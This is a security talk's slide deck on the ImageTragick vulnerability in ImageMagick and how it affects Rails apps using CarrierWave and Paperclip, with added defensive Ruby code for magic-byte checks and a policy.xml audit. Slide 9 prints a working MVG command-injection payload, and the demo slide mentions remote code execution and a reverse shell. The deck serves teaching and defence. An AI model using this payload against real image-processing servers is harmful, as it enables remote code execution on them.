Slide 1


ImageTragick and Rails
Gordon Chan @devgordon

Slide 2


What is ImageMagick?
ImageMagick® is a software suite that allows you to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, JPEG-2000, GIF, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG.
https://www.imagemagick.org

Slide 3


Image Manipulation Library
PNG, JPG, GIF, SVG, PS, PDF, MPEG, MVG, and more

Slide 4


Magic Bytes
ImageMagick identifies file type by its first few bytes

  # ImageMagick/MagickCore/magic.c
  { "JPEG", 0, MagicPattern("\377\330\377") },
  { "GIF",  0, MagicPattern("GIF8") },
  { "PNG",  0, MagicPattern("\211PNG\r\n\032\n") },
  { "SVG",  1, MagicPattern("?XML") },
  { "MVG",  0, MagicPattern("push graphic-context") },

Ignores file extensions

  $ identify rose.foo
  rose.foo JPEG 70x46 70x46+0+0 8-bit sRGB 2.36KB 0.000u 0:00.000

Slide 5


Coders and Delegates
Coders support the reading and/or writing of an image format (e.g. JPEG)
Delegates (external libraries) may be used to process files

  $ convert -list delegate
  ...
  bmp<=wdp    "mv" "%i" "%i.bmp"; "JxrEncApp" -i "%i.bmp" -o "%o.jxr"; mv "
  blender=>   "blender" -b "%i" -F PNG -o "%o" "\n" convert" -concatenate "%o*.png
  doc=>       "soffice" --headless --convert-to pdf --outdir `dirname "%i"`
  pdf<=>ps    "gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=
  mpeg=>      "ffmpeg" -nostdin -v -1 -i "%i" -vframes %S -vcodec pam -an -f raw
  https=>     "curl" -s -k -L -o "%o" "https:%M"
  ...

Slide 6


Delegates use system()
Commands are executed in the host environment

  "curl" -s -k -L -o "%o" "https:%M"

Parameters are substituted for values (e.g. file names, URLs)

  "curl" -s -k -L -o "/var/tmp/magick-95558" "https://a.com/img.jpg"

Slide 7


Magick Vector Graphics (MVG)
Describes 2D vector and mixed vector/raster graphics

  push graphic-context
  viewbox 0 0 624 369
  affine 0.283636 0 0 0.283846 -0 -0
  push graphic-context
  push graphic-context
  fill 'darkslateblue'
  stroke 'blue'
  stroke-width 1
  rectangle 1,1 2199,1299
  fill 'url(https://example.com/img.jpg)'

url() will use the HTTPS delegate, i.e. curl

  "curl" -s -k -L -o "/var/tmp/magick23" "https://example.com/img.jpg"

Slide 8


ImageTragick
Public disclosure on May 3, 2016
Collection of security vulnerabilities
Remote code execution (RCE)
File reading/moving/deletion
Server-side request forgery (SSRF)

Slide 9


CVE-2016-3714
Insufficient character filtering leads to code execution

  # exploit.mvg
  push graphic-context
  viewbox 0 0 640 480
  fill 'url(https://example.com/img.jpg";echo hello world")'

  $ convert exploit.mvg out.png
  hello world

HTTPS delegate

  "curl" -s -k -L -o "%o" "https:%M"
  # '%M' is replaced with '//example.com/img.jpg";echo hello world'
  "curl" ... "https://example.com/img.jpg";echo hello world

Slide 10


Attack Vector
Attacker uploads an image containing code they choose
Image is processed with ImageMagick => code is executed

Slide 11


Ruby on Rails
Ruby gems for file and image uploads - Paperclip and CarrierWave
Both depend on MiniMagick for processing images
MiniMagick is a wrapper for ImageMagick

Slide 12


File Extensions Mean Nothing
File name/extension and content-type whitelisting
CarrierWave believes what you tell it — no file inspection
Remember — ImageMagick uses 'magic bytes' to identify file types, not file extensions
∴ CarrierWave is vulnerable

Slide 13


Paperclip is Vulnerable
Paperclip inspects files to check their content-type

  $ file -b --mime image.png
  image/png; charset=binary

But it only looks at the first part of the content-type (image)
So we can present an SVG as a PNG

  $ file -b --mime svg.png
  image/svg+xml; charset=us-ascii

SVGs can reference external images (!)
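The check the Magic Bytes slide and the two vulnerable-gem slides point at, as an added example that is not from the talk or from either gem: a Ruby upload validator that identifies the format from the leading bytes using the same patterns the slides quote from magic.c, and accepts only raster formats whose bytes agree with the advertised extension. The extension map and the case-insensitive comparison are my own assumptions.

```ruby
# Added example (not from the talk): a magic-byte check for uploads, built on
# the patterns the slides quote from ImageMagick's magic.c. The extension map
# and the case-insensitive comparison are my own choices.
MAGIC = [
  # [format name, byte offset, pattern]
  ["JPEG", 0, "\xFF\xD8\xFF".b],
  ["GIF",  0, "GIF8".b],
  ["PNG",  0, "\x89PNG\r\n\x1A\n".b],
  ["SVG",  1, "?XML".b],                 # "<?xml ..." at offset 1
  ["MVG",  0, "push graphic-context".b],
].freeze

# Formats a raster-only upload endpoint is willing to hand to ImageMagick.
ALLOWED_FORMATS = %w[JPEG GIF PNG].freeze

# Advertised extensions and the format the bytes must actually be (assumption).
EXT_TO_FORMAT = { "jpg" => "JPEG", "jpeg" => "JPEG",
                  "gif" => "GIF",  "png" => "PNG" }.freeze

# Identify the format from the leading bytes, ImageMagick-style; nil if none
# of the patterns match. Comparison is case-insensitive so "<?xml" is SVG too.
def detect_format(bytes)
  head = bytes.b
  MAGIC.each do |name, offset, pattern|
    slice = head[offset, pattern.bytesize]
    next if slice.nil? || slice.bytesize < pattern.bytesize
    return name if slice.upcase == pattern.upcase
  end
  nil
end

# An upload is acceptable only if its bytes are an allowed raster format AND
# that format agrees with the client-supplied extension. "svg.png" holding SVG
# and "exploit.mvg" are both rejected; so is a JPEG uploaded as "rose.png".
def acceptable_upload?(filename, bytes)
  ext = File.extname(filename).delete_prefix(".").downcase
  detected = detect_format(bytes)
  return false unless ALLOWED_FORMATS.include?(detected)
  EXT_TO_FORMAT[ext] == detected
end

# Constructed sample inputs (header bytes only, not real files from the talk).
PNG_BYTES  = "\x89PNG\r\n\x1A\n\x00\x00\x00\rIHDR".b
JPEG_BYTES = "\xFF\xD8\xFF\xE0\x00\x10JFIF".b
SVG_BYTES  = %(<?xml version="1.0"?><svg><image href="https://example.com/img.jpg"/></svg>).b
MVG_BYTES  = "push graphic-context\nviewbox 0 0 640 480\n".b
```

In a CarrierWave or Paperclip app this runs before the file reaches MiniMagick, reading only the first few dozen bytes of the upload; the `file --mime` prefix check the Paperclip slide describes is replaced, not supplemented.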

Slide 14


Demo - Rails Application
Ruby 2.3.1
Rails 4.2.6
CarrierWave 0.11.2
Paperclip 4.3.6
MiniMagick 4.5.1
Debian 'jessie' ImageMagick 8:6.8.9.9-5+deb8u1
Docker - gordonchan/imagetragick-rails
Rails and Docker defaults
https://github.com/gchan/imagetragick-rails

Slide 15


Code #1

  class CarrierWaveImageUploader < CarrierWave::Uploader::Base
    version :thumb do
      process resize_to_fill: [200, 200]
    end
    ...
    def extension_white_list; %w(jpg jpeg gif png); end
    def content_type_whitelist; [/image\//]; end
  end

Slide 16


Code #2

  class Image < ActiveRecord::Base
    mount_uploader :carrier_wave_image, CarrierWaveImageUploader

    has_attached_file :paperclip_image, styles: { thumb: "100x100#" }
    validates_attachment_content_type :paperclip_image, content_type: ["image/jpeg", "image/png"]
    validates_attachment_file_name :paperclip_image, matches: [/png\Z/, /jpe?g\Z/]
  end

Slide 17


Demo Time
Remote code execution
Remote access (reverse shell)

Slide 18


Mitigation
Patches available for Debian (May 16)
Ubuntu patches coming soon? (as at May 26)
Disable vulnerable coders (policy.xml)
Test magic bytes of untrusted files
Consider ImageMagick alternatives
Sandbox image processing (seccomp, SELinux)
General server security
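For the "Disable vulnerable coders (policy.xml)" step, an added example (not from the talk): a small Ruby audit that parses a policy.xml and reports which of the coders named in the ImageTragick advisory's recommended policy are still enabled. The coder list is the one I recall from imagetragick.com, and both policy documents are constructed.

```ruby
require "rexml/document"

# Added example (not from the talk): audit an ImageMagick policy.xml for the
# coder restrictions recommended in the ImageTragick advisory (imagetragick.com).
# The coder list is as I recall it from that advisory; the policies are constructed.
IMAGETRAGICK_CODERS = %w[EPHEMERAL URL HTTPS MVG MSL TEXT SHOW WIN PLT].freeze

# Names of coders to which the policy grants no rights at all.
def disabled_coders(policy_xml)
  doc = REXML::Document.new(policy_xml)
  disabled = []
  doc.elements.each("policymap/policy") do |policy|
    next unless policy.attributes["domain"].to_s.casecmp?("coder")
    next unless policy.attributes["rights"].to_s.strip.casecmp?("none")
    disabled << policy.attributes["pattern"].to_s.upcase
  end
  disabled.uniq
end

# Coders from the advisory list that this policy still leaves usable.
def missing_restrictions(policy_xml)
  IMAGETRAGICK_CODERS - disabled_coders(policy_xml)
end

# Constructed: a policy that only blocks the two remote-fetch coders.
PARTIAL_POLICY = <<~XML
  <policymap>
    <policy domain="coder" rights="none" pattern="URL" />
    <policy domain="coder" rights="none" pattern="HTTPS" />
  </policymap>
XML

# Constructed: the full set of coder restrictions from the advisory.
FULL_POLICY = <<~XML
  <policymap>
    <policy domain="coder" rights="none" pattern="EPHEMERAL" />
    <policy domain="coder" rights="none" pattern="URL" />
    <policy domain="coder" rights="none" pattern="HTTPS" />
    <policy domain="coder" rights="none" pattern="MVG" />
    <policy domain="coder" rights="none" pattern="MSL" />
    <policy domain="coder" rights="none" pattern="TEXT" />
    <policy domain="coder" rights="none" pattern="SHOW" />
    <policy domain="coder" rights="none" pattern="WIN" />
    <policy domain="coder" rights="none" pattern="PLT" />
  </policymap>
XML
```

Against a real host, call `missing_restrictions(File.read(path))` with the installed policy (for the Debian ImageMagick 6 package that is /etc/ImageMagick-6/policy.xml); an empty result means every listed coder is denied.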

Slide 19


References and Sources
https://www.imagetragick.com
https://www.imagemagick.org
https://blog.cloudflare.com/inside-imagetragick-the-real-payloads-being-used-to-hack-websites-2/
https://github.com/ImageTragick/PoCs
https://github.com/thoughtbot/paperclip
https://github.com/carrierwaveuploader/carrierwave
https://github.com/ImageMagick/ImageMagick

Slide 20


Gordon Chan @devgordon
blog.devgordon.com
github.com/gchan